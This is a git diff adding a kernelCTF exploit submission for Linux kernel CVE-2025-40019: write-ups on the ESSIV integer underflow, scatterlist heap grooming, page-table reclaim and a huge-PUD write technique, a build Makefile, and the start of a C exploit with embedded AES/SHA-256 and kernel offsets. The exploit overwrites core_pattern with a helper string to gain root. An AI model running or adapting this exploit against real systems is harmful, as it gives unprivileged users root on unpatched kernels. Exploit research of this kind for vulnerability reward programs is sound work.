diff --git a/pocs/linux/kernelctf/CVE-2025-40019_mitigation_2/docs/exploit.md b/pocs/linux/kernelctf/CVE-2025-40019_mitigation_2/docs/exploit.md new file mode 100644 index 000000000..232a48089 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2025-40019_mitigation_2/docs/exploit.md @@ -0,0 +1,67 @@ +# Exploit + +This submission targets `mitigation-v4-6.12` as a novelty-only follow-up for CVE-2025-40019. The regular vulnerability slot for this CVE and target was already taken; the relevant new part is the page-table adaptation described in `docs/novel-techniques.md`. + +## High-Level Flow + +The exploit turns the ESSIV scatterwalk offset underflow into a 16-byte write through a reclaimed scatterlist entry. + +1. Create a sacrificial AF_ALG AEAD request that builds a chained receive scatterlist. +2. Free that request so the inline first receive SGL, a second receive SGL, and the tag SGL remain as residual slab contents. +3. Reclaim the second receive SGL slab slot with a Unix socket control-buffer allocation containing a crafted scatterlist entry. +4. Reclaim the freed anonymous pipe pages as user page-table pages. +5. Trigger the ESSIV decryption path with `assoclen == 0` and an output length of zero, causing `scatterwalk_ffwd()` to walk the residual SGL chain and write the encrypted IV into a page-table page. +6. Use a two-pass flow: pass 1 leaks the physical base needed for the target mapping, and pass 2 writes a coredump helper into `core_pattern`. + +The exploit does not use user namespaces, `io_uring`, BPF, or a separate KASLR leak service. + +## Scatterlist Shaping + +The trigger sends exactly 32 bytes to `essiv(authenc(hmac(sha256),cbc(aes)),sha256)`. For this transform, the authentication tag size is 32 bytes. During decrypt, `_aead_recvmsg()` computes: + +```text +outlen = used - authsize = 0x20 - 0x20 = 0 +``` + +Because `outlen` is zero, `af_alg_get_rsgl()` does not initialize the receive SGL. The request nevertheless passes the receive SGL to ESSIV as both source and destination. The vulnerable ESSIV offset calculation wraps to `0xfffffff0`, so `scatterwalk_ffwd()` walks past the inline SGL and follows stale chain entries. + +The sacrificial request constructs the stale chain before the trigger request: + +```text +first_rsgl[0..15] -> second_rsgl -> tsgl -> anonymous pipe pages +``` + +After the sacrificial request is freed, the exploit reclaims the `second_rsgl` allocation with a Unix socket `msg_control` buffer. The crafted entry supplies a large length value that steers the final `scatterwalk_ffwd()` position into the stale `tsgl` entries. The `tsgl` entries still encode pages that were freed after pipe closure; those pages are then reclaimed as page-table pages by a controlled `mmap()` spray. + +## IV Encoding + +ESSIV encrypts the IV before copying it back. The exploit embeds AES code so it can precompute an IV that decrypts to the desired 16-byte page-table write for the selected pass. + +In pass 1, the write maps a physical window that contains a known kernel trampoline page. Reading through the resulting huge mapping reveals enough physical address information to derive the `_stext` physical base used by pass 2. + +In pass 2, the write maps the 1 GB physical window containing `core_pattern` and writes the helper payload through the corrupted user mapping. + +## Privilege Escalation + +The payload written into `core_pattern` is: + +```text +|/proc/%P/root/tmp/ex %P +``` + +The `/proc/%P/root` prefix is required because the coredump helper path is resolved outside the process's jail-local mount namespace. The helper reopens the crashing process's standard file descriptors with `pidfd_open()` and `pidfd_getfd()`, then reads the flag from the target VM as root. + +## Reproduction + +Build and run on `mitigation-v4-6.12`: + +```sh +make +./exploit +``` + +For the vulnerability-only KASAN check: + +```sh +./exploit --vuln-trigger +``` diff --git a/pocs/linux/kernelctf/CVE-2025-40019_mitigation_2/docs/novel-techniques.md b/pocs/linux/kernelctf/CVE-2025-40019_mitigation_2/docs/novel-techniques.md new file mode 100644 index 000000000..9648acbb7 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2025-40019_mitigation_2/docs/novel-techniques.md @@ -0,0 +1,32 @@ +# Novel Technique: Huge-PUD Recovery From a Wrong-Level Page-Table Write + +The existing CVE-2025-40019 exploits targeted the same ESSIV scatterwalk primitive, but this submission handles a different landing condition on `mitigation-v4-6.12`: the repeated page-table write landed on a PUD page instead of a PTE page. + +The usual response to this condition is to treat it as a failed PTE hit. This exploit instead converts the wrong-level page-table write into a useful primitive by writing valid 1 GB huge-PUD entries. + +## Why This Works + +The ESSIV primitive gives a 16-byte write, but the copied value is the encrypted IV. By precomputing the IV, the exploit controls the 16 bytes that the kernel writes after ESSIV transforms it. + +When the reclaimed page is a PUD page, those 16 bytes can be used as two adjacent PUD entries. The exploit writes present, user-accessible huge entries that map a chosen 1 GB physical window into userspace. + +The exploit uses this twice: + +1. Pass 1 maps a physical window that exposes a stable kernel address-derived value, then derives the `_stext` physical base. +2. Pass 2 maps the 1 GB physical window containing `core_pattern`, then writes a coredump helper string through the resulting user mapping. + +This avoids needing the ESSIV write to hit a PTE page. It also avoids ROP and avoids depending on user namespaces or `io_uring`. + +## Namespace-Safe Coredump Helper + +The second novelty is operational rather than a new corruption primitive. Writing `|/tmp/ex %P` to `core_pattern` was not reliable in this environment because the kernel resolves the coredump helper outside the jail-local mount namespace. The working payload is: + +```text +|/proc/%P/root/tmp/ex %P +``` + +This resolves the helper through the crashing process's root, so the exploit can install `/tmp/ex` inside the target process namespace while the kernel still starts the correct helper as root. + +## Practical Impact + +This technique makes a page-table exploit usable even when the allocator consistently gives the vulnerable write a PUD page instead of a PTE page. For this target, that changed the result from repeated near-misses into a working mitigation bypass and flag capture. diff --git a/pocs/linux/kernelctf/CVE-2025-40019_mitigation_2/docs/vulnerability.md b/pocs/linux/kernelctf/CVE-2025-40019_mitigation_2/docs/vulnerability.md new file mode 100644 index 000000000..38ac9c993 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2025-40019_mitigation_2/docs/vulnerability.md @@ -0,0 +1,48 @@ +# CVE-2025-40019 + +## Requirements + +- Capabilities: none +- User namespaces: not required +- io_uring: not required +- Kernel configuration: `CONFIG_CRYPTO_USER_API`, `CONFIG_CRYPTO_USER_API_AEAD`, `CONFIG_CRYPTO_ESSIV` +- Affected component: Linux kernel crypto, ESSIV AEAD template +- Fixed by: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=6bb73db6948c2de23e407fe1b7ef94bf02b7529f +- Introduced by: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=be1eb7f78aa8fbe34779c56c266ccd0364604e71 +- Affected versions: v5.4 through v6.18 + +## Summary + +`essiv_aead_crypt()` performs an unchecked unsigned subtraction when copying the encrypted IV back into the destination scatterlist for decryption or in-place encryption. If `req->assoclen` is smaller than the AEAD IV size, the offset passed to `scatterwalk_map_and_copy()` wraps to a large unsigned value. + +The vulnerable path is reachable by an unprivileged local user through AF_ALG AEAD sockets using the ESSIV template, for example `essiv(authenc(hmac(sha256),cbc(aes)),sha256)`. + +## Root Cause + +In the vulnerable code, the decryption and in-place paths copy the transformed IV to: + +```c +scatterwalk_map_and_copy(req->iv, req->dst, + req->assoclen - crypto_aead_ivsize(tfm), + crypto_aead_ivsize(tfm), 1); +``` + +`req->assoclen` and `crypto_aead_ivsize(tfm)` are unsigned. With `assoclen == 0` and `ivsize == 16`, the subtraction becomes `0xfffffff0`. The later `ssize < 0` check existed only in the out-of-place encryption path, so it did not protect decryption or in-place encryption. + +AF_ALG allows userspace to set `ALG_SET_AEAD_ASSOCLEN` to zero and then issue a decrypt request. In `_aead_recvmsg()`, sending exactly the authentication tag size makes the receive output length zero. That causes `af_alg_get_rsgl()` to return without initializing the receive scatterlist, while the ESSIV layer still receives that scatterlist as `req->dst`. + +The wrapped offset makes `scatterwalk_ffwd()` walk beyond the initialized scatterlist entries and eventually treat residual heap data as a scatterlist entry. The ESSIV layer then writes the 16-byte encrypted IV to the page, offset, and length described by that residual or reclaimed entry. + +## Fix + +The fix moves the signed size validation to the start of `essiv_aead_crypt()`, before the decryption and in-place paths can use the underflowed value. + +## Minimal Trigger + +The submitted exploit supports: + +```sh +./exploit --vuln-trigger +``` + +That mode opens the ESSIV AF_ALG AEAD transform, sends a decrypt request with `ALG_SET_AEAD_ASSOCLEN = 0`, and calls `recv()` without the heap grooming or privilege escalation stages. diff --git a/pocs/linux/kernelctf/CVE-2025-40019_mitigation_2/exploit/mitigation-v4-6.12/Makefile b/pocs/linux/kernelctf/CVE-2025-40019_mitigation_2/exploit/mitigation-v4-6.12/Makefile new file mode 100644 index 000000000..65c989aeb --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2025-40019_mitigation_2/exploit/mitigation-v4-6.12/Makefile @@ -0,0 +1,21 @@ +CC ?= gcc +CFLAGS ?= -O2 -w -DMIT_612 +DEBUG_CFLAGS ?= -O2 -g -w -DMIT_612 +STATIC_LDFLAGS ?= -static + +all: exploit + +exploit: exploit.c wrapper.c + $(CC) -B/usr/bin/ $(CFLAGS) -o payload_bin exploit.c + cp /lib64/ld-linux-x86-64.so.2 ld_bin + if [ -e /lib/x86_64-linux-gnu/libc.so.6 ]; then cp /lib/x86_64-linux-gnu/libc.so.6 libc_bin; else cp /usr/lib64/libc.so.6 libc_bin; fi + ld -r -b binary -o payload_bin.o payload_bin + ld -r -b binary -o ld_bin.o ld_bin + ld -r -b binary -o libc_bin.o libc_bin + $(CC) -B/usr/bin/ -O2 -w $(STATIC_LDFLAGS) -o exploit wrapper.c payload_bin.o ld_bin.o libc_bin.o + +exploit_debug: exploit.c + $(CC) -B/usr/bin/ $(DEBUG_CFLAGS) -o $@ $< $(STATIC_LDFLAGS) + +clean: + rm -f exploit exploit_debug payload_bin ld_bin libc_bin payload_bin.o ld_bin.o libc_bin.o diff --git a/pocs/linux/kernelctf/CVE-2025-40019_mitigation_2/exploit/mitigation-v4-6.12/exploit b/pocs/linux/kernelctf/CVE-2025-40019_mitigation_2/exploit/mitigation-v4-6.12/exploit new file mode 100755 index 000000000..66dd8f1d1 Binary files /dev/null and b/pocs/linux/kernelctf/CVE-2025-40019_mitigation_2/exploit/mitigation-v4-6.12/exploit differ diff --git a/pocs/linux/kernelctf/CVE-2025-40019_mitigation_2/exploit/mitigation-v4-6.12/exploit.c b/pocs/linux/kernelctf/CVE-2025-40019_mitigation_2/exploit/mitigation-v4-6.12/exploit.c new file mode 100644 index 000000000..c07ab8e62 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2025-40019_mitigation_2/exploit/mitigation-v4-6.12/exploit.c @@ -0,0 +1,1019 @@ +/* + * CVE-2025-40019: Integer overflow in essiv_aead_crypt (crypto/essiv.c) + * Adapted for mitigation-v4-6.12 (kernel 6.12.0) + * + * Compile: gcc -B/usr/bin/ -O2 -w -DMIT_612 -o /tmp/ex /tmp/ex.c + * (NO -lssl -lcrypto -- all crypto is embedded) + * + * Exploit chain: + * 1. essiv_aead_crypt integer overflow: assoclen(0) - ivsize(16) = 0xfffffff0 + * causes scatterwalk_map_and_copy to write the 16-byte encrypted IV to an + * out-of-bounds scatterlist entry. + * 2. Uninitialized RX SGL: sending exactly authsize (32) bytes makes + * outlen = used - as = 0, so af_alg_get_rsgl returns early without + * calling sg_init_table -- the entire first_rsgl.sgl.sgl[] is uninitialized. + * 3. Chained SGL residual: a sacrificial authenc recvmsg with 32 iovecs + * builds a chained SGL: first_rsgl[0..15] (16 x 1-byte entries) -> chain -> + * second_rsgl -> chain -> tsgl (anonymous pipe pages from splice). + * af_alg_free_resources frees everything; put_page on pipe pages releases + * them to the page allocator. Slab slots retain residual chain links. + * 4. ctl_buf spray: sendmsg on Unix socket with msg_control = 0x208 bytes. + * ____sys_sendmsg does sock_kmalloc -> copy -> sock_kfree_s, reclaiming the + * second_rsgl slab slot with a crafted fake SGL entry (length=0xffffffe0). + * The chain link to old tsgl (at higher offset) is preserved as residual. + * 5. PTE spray + trigger: touch mmap'd pages to allocate PTE pages, reclaiming + * freed pipe pages. ESSIV recv allocates areq from same slab slot; + * scatterwalk_ffwd walks residual chain: 16 x 1 byte -> crafted entry + * (0xffffffe0) -> chain -> tsgl entry -> freed pipe page (now PTE page). + * IV write overwrites a PTE encoding a known physical address. + * 6. Two-pass exploit: pass 1 leaks _stext physical address via PTE remap; + * pass 2 targets core_pattern physical page. Crash child for root. + */ +#define _GNU_SOURCE +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +#define SYSCHK(x) ({ \ + typeof(x) __res = (x); \ + if (__res == (typeof(x))-1) \ + err(1, "SYSCHK(" #x ")"); \ + __res; \ +}) + +/* ================================================================== */ +/* Embedded AES-256-ECB (decrypt only) -- derived from tiny-AES-c */ +/* Public domain / CC0: https://github.com/kokke/tiny-AES-c */ +/* ================================================================== */ + +#define AES_BLOCKLEN 16 +#define AES_KEYLEN 32 +#define AES_keyExpSize 240 +#define Nb 4 +#define Nk 8 +#define Nr 14 + +typedef uint8_t state_t[4][4]; + +struct AesCtx { + uint8_t RoundKey[AES_keyExpSize]; +}; + +static const uint8_t sbox[256] = { + 0x63,0x7c,0x77,0x7b,0xf2,0x6b,0x6f,0xc5,0x30,0x01,0x67,0x2b,0xfe,0xd7,0xab,0x76, + 0xca,0x82,0xc9,0x7d,0xfa,0x59,0x47,0xf0,0xad,0xd4,0xa2,0xaf,0x9c,0xa4,0x72,0xc0, + 0xb7,0xfd,0x93,0x26,0x36,0x3f,0xf7,0xcc,0x34,0xa5,0xe5,0xf1,0x71,0xd8,0x31,0x15, + 0x04,0xc7,0x23,0xc3,0x18,0x96,0x05,0x9a,0x07,0x12,0x80,0xe2,0xeb,0x27,0xb2,0x75, + 0x09,0x83,0x2c,0x1a,0x1b,0x6e,0x5a,0xa0,0x52,0x3b,0xd6,0xb3,0x29,0xe3,0x2f,0x84, + 0x53,0xd1,0x00,0xed,0x20,0xfc,0xb1,0x5b,0x6a,0xcb,0xbe,0x39,0x4a,0x4c,0x58,0xcf, + 0xd0,0xef,0xaa,0xfb,0x43,0x4d,0x33,0x85,0x45,0xf9,0x02,0x7f,0x50,0x3c,0x9f,0xa8, + 0x51,0xa3,0x40,0x8f,0x92,0x9d,0x38,0xf5,0xbc,0xb6,0xda,0x21,0x10,0xff,0xf3,0xd2, + 0xcd,0x0c,0x13,0xec,0x5f,0x97,0x44,0x17,0xc4,0xa7,0x7e,0x3d,0x64,0x5d,0x19,0x73, + 0x60,0x81,0x4f,0xdc,0x22,0x2a,0x90,0x88,0x46,0xee,0xb8,0x14,0xde,0x5e,0x0b,0xdb, + 0xe0,0x32,0x3a,0x0a,0x49,0x06,0x24,0x5c,0xc2,0xd3,0xac,0x62,0x91,0x95,0xe4,0x79, + 0xe7,0xc8,0x37,0x6d,0x8d,0xd5,0x4e,0xa9,0x6c,0x56,0xf4,0xea,0x65,0x7a,0xae,0x08, + 0xba,0x78,0x25,0x2e,0x1c,0xa6,0xb4,0xc6,0xe8,0xdd,0x74,0x1f,0x4b,0xbd,0x8b,0x8a, + 0x70,0x3e,0xb5,0x66,0x48,0x03,0xf6,0x0e,0x61,0x35,0x57,0xb9,0x86,0xc1,0x1d,0x9e, + 0xe1,0xf8,0x98,0x11,0x69,0xd9,0x8e,0x94,0x9b,0x1e,0x87,0xe9,0xce,0x55,0x28,0xdf, + 0x8c,0xa1,0x89,0x0d,0xbf,0xe6,0x42,0x68,0x41,0x99,0x2d,0x0f,0xb0,0x54,0xbb,0x16 +}; + +static const uint8_t rsbox[256] = { + 0x52,0x09,0x6a,0xd5,0x30,0x36,0xa5,0x38,0xbf,0x40,0xa3,0x9e,0x81,0xf3,0xd7,0xfb, + 0x7c,0xe3,0x39,0x82,0x9b,0x2f,0xff,0x87,0x34,0x8e,0x43,0x44,0xc4,0xde,0xe9,0xcb, + 0x54,0x7b,0x94,0x32,0xa6,0xc2,0x23,0x3d,0xee,0x4c,0x95,0x0b,0x42,0xfa,0xc3,0x4e, + 0x08,0x2e,0xa1,0x66,0x28,0xd9,0x24,0xb2,0x76,0x5b,0xa2,0x49,0x6d,0x8b,0xd1,0x25, + 0x72,0xf8,0xf6,0x64,0x86,0x68,0x98,0x16,0xd4,0xa4,0x5c,0xcc,0x5d,0x65,0xb6,0x92, + 0x6c,0x70,0x48,0x50,0xfd,0xed,0xb9,0xda,0x5e,0x15,0x46,0x57,0xa7,0x8d,0x9d,0x84, + 0x90,0xd8,0xab,0x00,0x8c,0xbc,0xd3,0x0a,0xf7,0xe4,0x58,0x05,0xb8,0xb3,0x45,0x06, + 0xd0,0x2c,0x1e,0x8f,0xca,0x3f,0x0f,0x02,0xc1,0xaf,0xbd,0x03,0x01,0x13,0x8a,0x6b, + 0x3a,0x91,0x11,0x41,0x4f,0x67,0xdc,0xea,0x97,0xf2,0xcf,0xce,0xf0,0xb4,0xe6,0x73, + 0x96,0xac,0x74,0x22,0xe7,0xad,0x35,0x85,0xe2,0xf9,0x37,0xe8,0x1c,0x75,0xdf,0x6e, + 0x47,0xf1,0x1a,0x71,0x1d,0x29,0xc5,0x89,0x6f,0xb7,0x62,0x0e,0xaa,0x18,0xbe,0x1b, + 0xfc,0x56,0x3e,0x4b,0xc6,0xd2,0x79,0x20,0x9a,0xdb,0xc0,0xfe,0x78,0xcd,0x5a,0xf4, + 0x1f,0xdd,0xa8,0x33,0x88,0x07,0xc7,0x31,0xb1,0x12,0x10,0x59,0x27,0x80,0xec,0x5f, + 0x60,0x51,0x7f,0xa9,0x19,0xb5,0x4a,0x0d,0x2d,0xe5,0x7a,0x9f,0x93,0xc9,0x9c,0xef, + 0xa0,0xe0,0x3b,0x4d,0xae,0x2a,0xf5,0xb0,0xc8,0xeb,0xbb,0x3c,0x83,0x53,0x99,0x61, + 0x17,0x2b,0x04,0x7e,0xba,0x77,0xd6,0x26,0xe1,0x69,0x14,0x63,0x55,0x21,0x0c,0x7d +}; + +static const uint8_t Rcon[11] = { + 0x8d, 0x01, 0x02, 0x04, 0x08, 0x10, 0x20, 0x40, 0x80, 0x1b, 0x36 +}; + +#define getSBoxValue(num) (sbox[(num)]) +#define getSBoxInvert(num) (rsbox[(num)]) + +static void KeyExpansion(uint8_t *RoundKey, const uint8_t *Key) +{ + unsigned i, j, k; + uint8_t tempa[4]; + + for (i = 0; i < Nk; ++i) { + RoundKey[(i * 4) + 0] = Key[(i * 4) + 0]; + RoundKey[(i * 4) + 1] = Key[(i * 4) + 1]; + RoundKey[(i * 4) + 2] = Key[(i * 4) + 2]; + RoundKey[(i * 4) + 3] = Key[(i * 4) + 3]; + } + + for (i = Nk; i < Nb * (Nr + 1); ++i) { + k = (i - 1) * 4; + tempa[0] = RoundKey[k + 0]; + tempa[1] = RoundKey[k + 1]; + tempa[2] = RoundKey[k + 2]; + tempa[3] = RoundKey[k + 3]; + + if (i % Nk == 0) { + /* RotWord */ + uint8_t u8tmp = tempa[0]; + tempa[0] = tempa[1]; + tempa[1] = tempa[2]; + tempa[2] = tempa[3]; + tempa[3] = u8tmp; + /* SubWord */ + tempa[0] = getSBoxValue(tempa[0]); + tempa[1] = getSBoxValue(tempa[1]); + tempa[2] = getSBoxValue(tempa[2]); + tempa[3] = getSBoxValue(tempa[3]); + tempa[0] = tempa[0] ^ Rcon[i / Nk]; + } + if (i % Nk == 4) { + tempa[0] = getSBoxValue(tempa[0]); + tempa[1] = getSBoxValue(tempa[1]); + tempa[2] = getSBoxValue(tempa[2]); + tempa[3] = getSBoxValue(tempa[3]); + } + j = i * 4; k = (i - Nk) * 4; + RoundKey[j + 0] = RoundKey[k + 0] ^ tempa[0]; + RoundKey[j + 1] = RoundKey[k + 1] ^ tempa[1]; + RoundKey[j + 2] = RoundKey[k + 2] ^ tempa[2]; + RoundKey[j + 3] = RoundKey[k + 3] ^ tempa[3]; + } +} + +static void AddRoundKey(uint8_t round, state_t *state, const uint8_t *RoundKey) +{ + for (uint8_t i = 0; i < 4; ++i) + for (uint8_t j = 0; j < 4; ++j) + (*state)[i][j] ^= RoundKey[(round * Nb * 4) + (i * Nb) + j]; +} + +static void InvSubBytes(state_t *state) +{ + for (uint8_t i = 0; i < 4; ++i) + for (uint8_t j = 0; j < 4; ++j) + (*state)[j][i] = getSBoxInvert((*state)[j][i]); +} + +static void InvShiftRows(state_t *state) +{ + uint8_t temp; + /* Row 1: shift right 1 */ + temp = (*state)[3][1]; + (*state)[3][1] = (*state)[2][1]; + (*state)[2][1] = (*state)[1][1]; + (*state)[1][1] = (*state)[0][1]; + (*state)[0][1] = temp; + /* Row 2: shift right 2 */ + temp = (*state)[0][2]; + (*state)[0][2] = (*state)[2][2]; + (*state)[2][2] = temp; + temp = (*state)[1][2]; + (*state)[1][2] = (*state)[3][2]; + (*state)[3][2] = temp; + /* Row 3: shift right 3 */ + temp = (*state)[0][3]; + (*state)[0][3] = (*state)[1][3]; + (*state)[1][3] = (*state)[2][3]; + (*state)[2][3] = (*state)[3][3]; + (*state)[3][3] = temp; +} + +static uint8_t xtime(uint8_t x) +{ + return ((x << 1) ^ (((x >> 7) & 1) * 0x1b)); +} + +static uint8_t Multiply(uint8_t x, uint8_t y) +{ + return (((y & 1) * x) ^ + ((y >> 1 & 1) * xtime(x)) ^ + ((y >> 2 & 1) * xtime(xtime(x))) ^ + ((y >> 3 & 1) * xtime(xtime(xtime(x)))) ^ + ((y >> 4 & 1) * xtime(xtime(xtime(xtime(x)))))); +} + +static void InvMixColumns(state_t *state) +{ + uint8_t a, b, c, d; + for (int i = 0; i < 4; ++i) { + a = (*state)[i][0]; + b = (*state)[i][1]; + c = (*state)[i][2]; + d = (*state)[i][3]; + (*state)[i][0] = Multiply(a, 0x0e) ^ Multiply(b, 0x0b) ^ Multiply(c, 0x0d) ^ Multiply(d, 0x09); + (*state)[i][1] = Multiply(a, 0x09) ^ Multiply(b, 0x0e) ^ Multiply(c, 0x0b) ^ Multiply(d, 0x0d); + (*state)[i][2] = Multiply(a, 0x0d) ^ Multiply(b, 0x09) ^ Multiply(c, 0x0e) ^ Multiply(d, 0x0b); + (*state)[i][3] = Multiply(a, 0x0b) ^ Multiply(b, 0x0d) ^ Multiply(c, 0x09) ^ Multiply(d, 0x0e); + } +} + +static void InvCipher(state_t *state, const uint8_t *RoundKey) +{ + AddRoundKey(Nr, state, RoundKey); + for (uint8_t round = (Nr - 1); ; --round) { + InvShiftRows(state); + InvSubBytes(state); + AddRoundKey(round, state, RoundKey); + if (round == 0) break; + InvMixColumns(state); + } +} + +static void aes256_ecb_decrypt(const uint8_t *key, const uint8_t *in, uint8_t *out) +{ + struct AesCtx ctx; + KeyExpansion(ctx.RoundKey, key); + memcpy(out, in, AES_BLOCKLEN); + InvCipher((state_t *)out, ctx.RoundKey); +} + +/* ================================================================== */ +/* Embedded SHA-256 (minimal, single-use) */ +/* ================================================================== */ + +static const uint32_t sha256_k[64] = { + 0x428a2f98,0x71374491,0xb5c0fbcf,0xe9b5dba5,0x3956c25b,0x59f111f1,0x923f82a4,0xab1c5ed5, + 0xd807aa98,0x12835b01,0x243185be,0x550c7dc3,0x72be5d74,0x80deb1fe,0x9bdc06a7,0xc19bf174, + 0xe49b69c1,0xefbe4786,0x0fc19dc6,0x240ca1cc,0x2de92c6f,0x4a7484aa,0x5cb0a9dc,0x76f988da, + 0x983e5152,0xa831c66d,0xb00327c8,0xbf597fc7,0xc6e00bf3,0xd5a79147,0x06ca6351,0x14292967, + 0x27b70a85,0x2e1b2138,0x4d2c6dfc,0x53380d13,0x650a7354,0x766a0abb,0x81c2c92e,0x92722c85, + 0xa2bfe8a1,0xa81a664b,0xc24b8b70,0xc76c51a3,0xd192e819,0xd6990624,0xf40e3585,0x106aa070, + 0x19a4c116,0x1e376c08,0x2748774c,0x34b0bcb5,0x391c0cb3,0x4ed8aa4a,0x5b9cca4f,0x682e6ff3, + 0x748f82ee,0x78a5636f,0x84c87814,0x8cc70208,0x90befffa,0xa4506ceb,0xbef9a3f7,0xc67178f2 +}; + +#define SHA_ROTR(x,n) (((x) >> (n)) | ((x) << (32-(n)))) +#define SHA_CH(x,y,z) (((x) & (y)) ^ (~(x) & (z))) +#define SHA_MAJ(x,y,z) (((x) & (y)) ^ ((x) & (z)) ^ ((y) & (z))) +#define SHA_EP0(x) (SHA_ROTR(x,2) ^ SHA_ROTR(x,13) ^ SHA_ROTR(x,22)) +#define SHA_EP1(x) (SHA_ROTR(x,6) ^ SHA_ROTR(x,11) ^ SHA_ROTR(x,25)) +#define SHA_SIG0(x) (SHA_ROTR(x,7) ^ SHA_ROTR(x,18) ^ ((x) >> 3)) +#define SHA_SIG1(x) (SHA_ROTR(x,17) ^ SHA_ROTR(x,19) ^ ((x) >> 10)) + +static void sha256_transform(uint32_t state[8], const uint8_t data[64]) +{ + uint32_t a, b, c, d, e, f, g, h, t1, t2, m[64]; + int i; + + for (i = 0; i < 16; ++i) + m[i] = ((uint32_t)data[i*4] << 24) | ((uint32_t)data[i*4+1] << 16) | + ((uint32_t)data[i*4+2] << 8) | ((uint32_t)data[i*4+3]); + for (; i < 64; ++i) + m[i] = SHA_SIG1(m[i-2]) + m[i-7] + SHA_SIG0(m[i-15]) + m[i-16]; + + a = state[0]; b = state[1]; c = state[2]; d = state[3]; + e = state[4]; f = state[5]; g = state[6]; h = state[7]; + + for (i = 0; i < 64; ++i) { + t1 = h + SHA_EP1(e) + SHA_CH(e,f,g) + sha256_k[i] + m[i]; + t2 = SHA_EP0(a) + SHA_MAJ(a,b,c); + h = g; g = f; f = e; e = d + t1; + d = c; c = b; b = a; a = t1 + t2; + } + + state[0] += a; state[1] += b; state[2] += c; state[3] += d; + state[4] += e; state[5] += f; state[6] += g; state[7] += h; +} + +/* + * Compute SHA-256 of (data, datalen). Output is 32 bytes in hash_out. + * Minimal implementation -- handles any length up to ~2^32 bytes. + */ +static void sha256(const uint8_t *data, size_t datalen, uint8_t *hash_out) +{ + uint32_t state[8] = { + 0x6a09e667, 0xbb67ae85, 0x3c6ef372, 0xa54ff53a, + 0x510e527f, 0x9b05688c, 0x1f83d9ab, 0x5be0cd19 + }; + uint8_t block[64]; + size_t i, left; + uint64_t bitlen; + + /* Process full 64-byte blocks */ + for (i = 0; i + 64 <= datalen; i += 64) + sha256_transform(state, data + i); + + /* Pad final block */ + left = datalen - i; + memset(block, 0, 64); + memcpy(block, data + i, left); + block[left] = 0x80; + + if (left >= 56) { + sha256_transform(state, block); + memset(block, 0, 64); + } + + bitlen = (uint64_t)datalen * 8; + block[56] = (bitlen >> 56) & 0xff; + block[57] = (bitlen >> 48) & 0xff; + block[58] = (bitlen >> 40) & 0xff; + block[59] = (bitlen >> 32) & 0xff; + block[60] = (bitlen >> 24) & 0xff; + block[61] = (bitlen >> 16) & 0xff; + block[62] = (bitlen >> 8) & 0xff; + block[63] = (bitlen) & 0xff; + sha256_transform(state, block); + + for (i = 0; i < 8; i++) { + hash_out[i*4] = (state[i] >> 24) & 0xff; + hash_out[i*4 + 1] = (state[i] >> 16) & 0xff; + hash_out[i*4 + 2] = (state[i] >> 8) & 0xff; + hash_out[i*4 + 3] = (state[i]) & 0xff; + } +} + +/* ------------------------------------------------------------------ */ +/* Target-specific kernel symbol offsets (virtual address - STEXT) */ +/* ------------------------------------------------------------------ */ + +#define STEXT 0xffffffff81000000UL /* kernel _stext virtual address */ + +#if defined(LTS) /* LTS 6.12.48 */ +#define CORE_PATTERN (0xffffffff842107e0UL - STEXT) +#define BRK_BASE (0xffffffff85600000UL - STEXT) + +#elif defined(MIT) /* mitigation-v4-6.6 */ +#define CORE_PATTERN (0xffffffff83db3720UL - STEXT) +#define BRK_BASE (0xffffffff84e00000UL - STEXT) + +#elif defined(COS) /* cos-121-18867.199.56 */ +#define CORE_PATTERN (0xffffffff83fb4940UL - STEXT) +#define BRK_BASE (0xffffffff85200000UL - STEXT) + +#elif defined(MIT_612) /* mitigation-v4-6.12 (kernel 6.12.0) */ +#define CORE_PATTERN 0x321b460UL +#define BRK_BASE 0x4400000UL + +#else +/* Default to MIT_612 if no target defined */ +#define MIT_612 1 +#define CORE_PATTERN 0x321b460UL +#define BRK_BASE 0x4400000UL + +#endif + +/* Page-aligned base and intra-page offset of core_pattern */ +#define CORE_PATTERN_PAGE_OFFSET (CORE_PATTERN & 0xfff) +#define CORE_PATTERN_PAGE_BASE (CORE_PATTERN & ~0xfffUL) + +/* ------------------------------------------------------------------ */ +/* PTE flags for x86-64 page table entries */ +/* ------------------------------------------------------------------ */ + +/* Present | RW | User | Accessed | Dirty (first-pass PTE) + * Points to physical address 0x9c000 (trampoline_pgd), which contains + * the _brk area virtual address -- used to derive _stext physical address. + * See: https://github.com/google/security-research/blob/ca13fc6d5e7184b13bb82a91dd3a6fa2430fdbd7/pocs/linux/kernelctf/CVE-2023-6560_mitigation/docs/exploit.md#leak-through-write */ +/* PUD-mode branch: observed live runs repeatedly write our chosen value into a + * user PUD page, not a PTE page. Treat that as the primitive by installing a + * deliberate 1GB huge-PUD leaf: Present | RW | User | Accessed | Dirty | PSE. + * Pass 1 maps physical 0..1GB so VA+0x9c000 reads the trampoline page. Pass 2 + * maps the 1GB physical region containing core_pattern. */ +#define PUD_HUGE_FLAGS 0x00000000000000e7UL +#define PTE_FLAGS_FIRST_PASS PUD_HUGE_FLAGS +#define PTE_FLAGS_SECOND_PASS PUD_HUGE_FLAGS +#define PUD_HUGE_MASK 0x3fffffffUL +#define PUD_HUGE_SIZE 0x40000000UL +#define TRAMPOLINE_PHYS 0x9c000UL + +/* ------------------------------------------------------------------ */ +/* Exploit layout constants */ +/* ------------------------------------------------------------------ */ + +#define PAGE_SIZE 0x1000 + +/* ORIGINAL spray params: 0x400 pages at 2MB spacing from 0x200000. + * The "bad pud" on first run PROVES the PTE value write works. + * The PUD-level write is because freed pipe pages go to PUD alloc. + * This is actually OK — the PUD entry maps a 1GB region. + * If PUD entry = 0x800000000009c067: the entire 1GB maps to phys 0x9c000. + * Accessing any address in that 1GB reads from phys 0x9c000 page! */ +#define PTE_SPRAY_COUNT 0x400 +/* Spacing between sprayed pages (each in a separate PTE page) */ +#define PTE_SPRAY_SPACING 0x200000 +/* Base virtual address for the PTE spray region */ +#define PTE_SPRAY_BASE 0x200000UL + +/* Size of the authenc sendmsg payload */ +#define AUTHENC_SENDMSG_LEN 0x20 +/* Number of splice calls per pipe. 